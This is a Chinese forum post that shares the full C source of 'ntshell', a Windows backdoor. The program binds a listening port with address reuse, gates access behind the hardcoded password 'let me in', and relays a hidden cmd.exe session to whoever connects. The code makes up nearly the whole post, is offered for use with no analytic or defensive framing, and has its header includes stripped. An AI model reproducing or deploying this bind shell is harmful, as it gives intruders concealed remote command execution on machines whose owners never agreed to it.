ntshell的核心源代码
信息来源:dahubaobao[b]端口复用相关资料[/b]
[code]//ntshell的核心代码
#include
#include
#include
#include
#include
#define buflen 2000
#define shellsize 2000
void shell();
u_int port;
long i;
int main(int argc, char *argv[])
{
int *ret;
_asm mov i,ebp
ret=(int*)i+1; //ret-->return address
//print function of program and check parameters
if(argc<2)
{
puts(" This program built a listen port(u specify), and worked as a telnet server");
printf("\n USAGE:\n\t%s \n", argv[0]);
puts("\t listenport: specify the (port) number to (listen)");
exit(0);
}
port=atoi(argv[1]);
if(port<=0)port=23;
WSAData wsa;
if(WSAStartup(MAKEWORD(1,1),&wsa))
{puts(" Error to start up winsock!");return 0;}
shell();
WSACleanup();
return 0;
}
void shell()
{
SOCKET lsts,cons;
lsts=socket(AF_INET, SOCK_STREAM, 0);
if(lsts==INVALID_SOCKET)
{puts(" Create socket error!");return;}
int val=1;
char buff[100], data[buflen];
hostent *host;
u_long ip;
sockaddr_in locsin;
setsockopt(lsts, SOL_SOCKET, SO_REUSEADDR, (char*)&val, sizeof(val));
gethostname(buff,80);
host=gethostbyname(buff);
if(host==0)
{puts(" Get host error!");return;}
memcpy(&ip, host->h_addr_list[0], host->h_length);
memset(&locsin,0,sizeof(locsin));
locsin.sin_addr.S_un.S_addr =ip;
locsin.sin_family = AF_INET;
locsin.sin_port = htons(port);
bind(lsts, (sockaddr*)&locsin, sizeof(locsin));
listen(lsts,3);
int links=0;
char passwd[]="let me in";
//check password, input 'let me in' first
do{
val=sizeof(locsin);
cons=accept(lsts, (sockaddr*)&locsin,&val);
if(cons==INVALID_SOCKET)
{
val=(int)GetLastError();
printf(" accept error, error code:'%d' !",val);
return;
}
val=recv(cons, data, buflen, 0);
}while(memcmp(data, passwd, strlen(passwd))!=0 && ++links<100);
if(links>=100)return;
//notice: this only wait 1 packet, not cr-lf, so send passwd at 1 time
//dont use windows default telnet client prog
HANDLE rp1, wp1, rp2, wp2;
SECURITY_ATTRIBUTES sa;
sa.nLength = sizeof(sa);
sa.lpSecurityDescriptor = 0;
sa.bInheritHandle = 1;
CreatePipe(&rp1, &wp1, &sa, 0);
CreatePipe(&rp2, &wp2, &sa, 0);
STARTUPINFO si;
PROCESS_INFORMATION pi;
memset(&si,0,sizeof(si));
si.hStdError = si.hStdOutput = wp1;
si.hStdInput = rp2;
si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
si.wShowWindow = SW_HIDE;
si.lpReserved=0;
si.lpReserved2=0;
si.cbReserved2 =0;
si.cb = sizeof(si);
//this two must not exchange
if(!CreateProcess(0, "cmd.exe", 0, 0, 1, 0, 0, 0, &si, &pi))
{
val=(int)GetLastError();
printf(" create cmd.exe process error, error code %d !",val);
return;
}
CloseHandle(rp2);CloseHandle(wp1);
u_long num, use;
while(1)
{
while(1)//bytes in pipe
{
if(!PeekNamedPipe(rp1, data, buflen, &num, &use, 0))
{num=0xffffffff;break;}//return TURE is OK
if(use && !ReadFile(rp1, data, use, &num, 0))
{num=0xffffffff;break;}//return 0 if error, close
if(num)send(cons, data, num, 0);
Sleep(100);
if(!use)break;
}
if(num==0xffffffff)break;
val=recv(cons, data, buflen ,0);
if(val==0||val==SOCKET_ERROR)
{
puts(" Write to client error! Client may close!");
TerminateProcess(pi.hProcess, 0);
closesocket(cons);
closesocket(lsts);
break;
}
WriteFile(wp2, data, val, &num, 0);
Sleep(100);
}
return;
}[/code] 看了就要顶
页:
[1]